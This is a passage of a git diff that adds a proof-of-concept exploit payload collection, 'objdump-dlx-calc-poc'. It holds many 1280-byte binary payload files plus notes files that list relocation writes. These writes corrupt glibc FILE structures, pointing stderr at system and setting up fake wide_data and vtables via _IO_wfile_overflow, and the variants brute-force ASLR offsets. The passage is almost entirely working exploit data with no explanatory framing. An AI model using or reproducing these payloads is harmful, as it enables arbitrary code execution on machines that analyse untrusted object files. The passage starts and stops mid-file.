sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..9eb3932557300f35031e7edbac0dd2f2c7907019 GIT binary patch literal 1280 zcmd5*O-mb56g`s}jj^UiQ?=TH1q%v+*f+6$pi)7!ixw<&Q85KIm{vg>$ctcUq5cH- zaqCL_0lIS8pHQ&dLYMAcjOWf*#zz-jdf~lu&%I|Z_r1CA$I{znD`g=zYwd)7B4GdZ za})kPhBVq^?Y(kRvw)oeQgeWl@x1eOpiOuaXcs&N(h}bQI>;Y<05XEBK&N1tOYkGm zMYO*GS;6nXL;3Cy=(fqPfSkmC13eP|3G_1V%mR7FojKqU;}^W0K8ZJheu*Cg0}`JG z9;bq<8w>zLAwCK5-@syt|H2M{;824Hu57ze)Rg8v>W$dF!bYwzEoTMlRV#)q33_NbN*K=e)+imqM?6n=--gb zy+-%BLSHQ6?*kfh&XI3HUcZ1=&@OZddII_-^d$5Y^fdGgQ<7$0QJ|<$lqhNxMT#m# znWE06&XqdUxzxFQf5k@ipn>96wX*+tedo)k8jAJm?j5eb?lm?mDC$N%!0pfrd;A}e z8Iu*gb9wnPQ;|h}nt|jza;|X{i4wUyea=4?xWxEg{3Uh#dnR^p$y^8z&0;O FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e6ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..b534929662d3c4c5c6dda4d3ebe94454face8cea GIT binary patch literal 1280 zcmd5*O-mb56g`s}jj^UiQ?=TH1q%v+*f+6$pi)7!ixw<&Q85KIm{vg>$ctcUq5cH- zaqCL_0lIS8pHQ&t(xrPBUU=`^bMKkUeQ)mjvGjJ?N?C}_T05bi2-tu9 z+=Rc6A&vG}d#{|-EMRAV)EwYsJnwuRXcOK9+69k+w8S@n4)O;dfQ;ZO&?#8v68s2s z5$$h4R`5IUP`*0^x^40+ASdzPK##l%$zg6eubbC5jqFk)ldb zrl@nNbEOV-E_E*7U$Id=XrQ=Nt?YkZ-}&;XhGMt`a69zE9{&eq z#$-kBTwcD+RAiB#W*|9_oNF9KqC_rFpYx9eE-}6re@Pwxo{1e?G8e)_vslZzBx&Q~ isQW$0Y!*UJ5VPNLEBkJ+MLm@y*^1kz^ygbV==~P?ynWFC literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e6ff.notes new file mode 100644 index 0000000..97f797a --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e6ff.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x05 +buf_delta=0xf020ff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..714a463865c3134cc42422f05897ae91321afddb GIT binary patch literal 1280 zcmd5*O-md>5Ph>Vx*ula$C^#lfPn}JEUfnI8Wjx*i1Cnsf(IolXe65`_=UZKVj%tm z?|Stl{(yM$n4b_ZSHWZM9>!PmwPTY*jw$GV^{U zSM~RoNTW5@{#QRIwbxZ=#=RJfhPTaEE@9r}1mxJdw{C`n;jXE z=zEO(QzPGRtwaqVEDDTwQ?{U4q(fG82vTp1IxEgw4kN*NP zW3r-mE-znZDzeB=GmxA|&NYrAQ6g8M&-uq&E-}6re@Pwxo{1SQnG4~eS*&GUlC*Gf i)cqc0HcKHVh}pB;YQ7t6QBM^~Hskgg{nt$%^nM5VzJ1XE literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e5ff.notes new file mode 100644 index 0000000..1a1b38c --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e5ff.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x05 +buf_delta=0xf020ff00 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f42e600.bin new file mode 100644 index 0000000000000000000000000000000000000000..5a4487645ca42b4c0a02c00574d47d3b8dc92022 GIT binary patch literal 1280 zcmd5*O)n%-6g|~dwDwIK--!sxNF;4uHG?1{1Pc-p3xdQD?ISTG@p=+MGV>E=&vsVg z2e7jA6C|uBc7A|GIk!H#%Zr7jo7_70oO|l!)vNn{Pt8qR2@8d=R{pV$3HGDk>-V2M zNTRgh{ZK_>1h7*;Via&vo_Dnlln6fqN(Ik>r0Cy)GV+QgASJjAlnbsh1=oN|qJ08X z37!Jg^4=ey#wNc9YDIql>O{W<>Zv;;K$^NU3N%o^=IMMA{S0Un{Tyf#eF$hy1V`5r z09r$A3-N8>VzK|i9q^;*wBUIj(Wwu(!#d8Bxa+=*^~()^mEo@?e~$UnhQHD9w;26) zqu*ilyNv$lr%o!x{r4LFKEt0qnD`&}4;p^{hgaYKZC*~Jxc;Q!pE3Ni-gtPEMv-C2oJ;JTGkCo36rDl??Gm> dH{=8fdx4KtzYHGHp0d&`>h=Zeu_6!l{sK7nd(r>^ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f42e600.notes new file mode 100644 index 0000000..77ffde1 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f42e600.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x06 +buf_delta=0xef210000 +wide_delta=0x4fff0000 +system_delta=0x6f42e600 +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..c3bd2df1c4c09739d4983471647c1456ff0066c2 GIT binary patch literal 1280 zcmd5*O-oxr6g@BRX^fxIRBKcaX`zA;J1?;+NvROjMGFzSsMJENm{y^!kcnVv!TtpI zy6vj?19a78e?p;dh3@9of7bX`Z;fBSoC9HMD!Ejq38?1 zXd<|}YycPwaXiG^fs4id3wOXn(P_c+JfbrcaEE!EC-L|3X{_FD`1=fhn*2KE&lvs@ z!=E+k6GnZ~s6R65Pp+n@wDvz^_-74&ey@BPKi|CJ=YMEB|BH&aTkDq%|El4CNiO#q z-DiclM8sbQw8_~=egt*>6k0*M(0S+r^c?gv=y~V`=tY*K%(|jM(V=Kj^eCDXU5YkE zpG%)B>(J-Y=kopK8nuH4a@)17{g2h%FCX@htJglYasBmk=UcU5H6j7d}5bsC!HI5=vtd?QU{>KuB1mBB4WF7yWiCrAh7sA7^xR&*sq=SR4 i?(ac*b0*{j344vxhMxvgw5PljTe|&=`STVJ_I?9@&3w@S literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e5ff.notes new file mode 100644 index 0000000..b4830e1 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e5ff.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x06 +buf_delta=0xef210000 +wide_delta=0x4fff0000 +system_delta=0x6f43e5ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e6ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..d255eda80ebcaa47c8b95eb314b5da20d1a0aa2f GIT binary patch literal 1280 zcmd5*O-oxr6g@BRX^fxIRBKcaX`zA;J1?;+NvROjMGFzSsMJENm{y^!kcnVv!TtpI zy6vj?19a78e?pAhD;q6pY2AW;IGl;@pQfezuvK&RjdkQ99r=pyfV1Ed7kfo{PK4#9Uo zFVX%6^a*|k`sKSHz<^Eu4@irC0St=%2Na91rn!;9{}=!X5BXbXxE{kLU~q++iN)N&J0$8mo63{yxK>CclpPGlqY} z@Mn$sgi)U~>W_^2ldCBzt^Lm!{#nDH-z#6n&o^)Q`5)TO|Dq!9*7{|`ziRkjlFPkD z_gP^s5%JdnZF2UJA3a|a8Tz~!Cc)x|5Zqx(Z3A1pIcLC`! z8PPkJmoGgPMU*Eg#QTwbjibmEt7Vw8|FOg&!S~`1S;xO;Vi$+>h43&eu4Vlu>EK|i i`+JbyoC!HW!d~OF;ithA?I|zCmTv!I{=CJ5z25+W7kttH literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e6ff.notes new file mode 100644 index 0000000..b97fe85 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e6ff.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x06 +buf_delta=0xef210000 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..5cea9885154c7f6912971e78c1ca9a357ed45c4b GIT binary patch literal 1280 zcmd5*%Ss$U6g@rN+A~I@&P0td5Q2h&Fj_sMPSB8mL>CDd$RgqhK5%@1nlLqjLBV`N z_Rcn|kPpz6OFuzKwt~BSKo*^I`!UlNS-A8<)w$=~(?wPFt&=zJ=B$*3Mp#SVnI{DM zCa4vIc?2$68{T`Bq^1Eo1EgjEC*%8PD?p3zQ=nC_4!EMP0%`IGAAyYEBG4vS<`7&4 z+KKiN&>?sXJe2Rg0-ZMbFQ7~G-$1wMmq3=fGY#aZJ2Su|>gT+j9??&MUeW77pXepv zaVosJ{t)ma!hs0?4_qwqU$_GvicSl@?-QMD$Q|ZM?&50bXQJL__&W@L7x~|WKWF%R z4S&B;e`?g98TCPv3oW?Lilyi_jC$lh9MpCFmC{Ntty;gQ7#xqUcdHDY_JG ziaw7%Pu8K&qtD~}%hxK0HRLxc>jzsaJNuiTkgryDZ*l!)ueP?1yslM4+>Wwnk9Ps- zF&XhYmzOU+6-S)A6q5bOzQ(uMl&IyHv;Xm$LxS%m7_v@q&%`u`^o8&!EUsl;khE~H j)q_1qZ;nQsAYs4fR1VT`iuY8IVpF$&Fn`(P;okoNf*E|$ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e5ff.notes new file mode 100644 index 0000000..8f41d5d --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e5ff.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x06 +buf_delta=0xef210000 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f42e600.bin new file mode 100644 index 0000000000000000000000000000000000000000..79841f5254e06ac6ccb17b71a461a7cd0c1dff2a GIT binary patch literal 1280 zcmd5*O-mb56g`ufn8a$eMs3pyEm%+p#J)-VC@M;e?V>^i7fKcUz*q&VkQYHw(4XL5 zx2{TmK)dR)KS5~M;RE;bMKkUoj3QL%*?*CQWj#fK3+0TB!g0v(DOeueg9O|Zy)!6Yv|t_`VZuC zuF-i`8H+`HKA3juJobKrOxI3D>Z5d4U{%&>-(Qpws$x8P^#B}CBRNz=LN i{tU94#gG%k>^VM`{4jV#GnJ)yo43C(p1kG3?Ee6;oP5y$ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f42e600.notes new file mode 100644 index 0000000..ccba346 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f42e600.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x06 +buf_delta=0xf020ff00 +wide_delta=0x4fff0000 +system_delta=0x6f42e600 +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e5ff.bin new file mode 100644 index 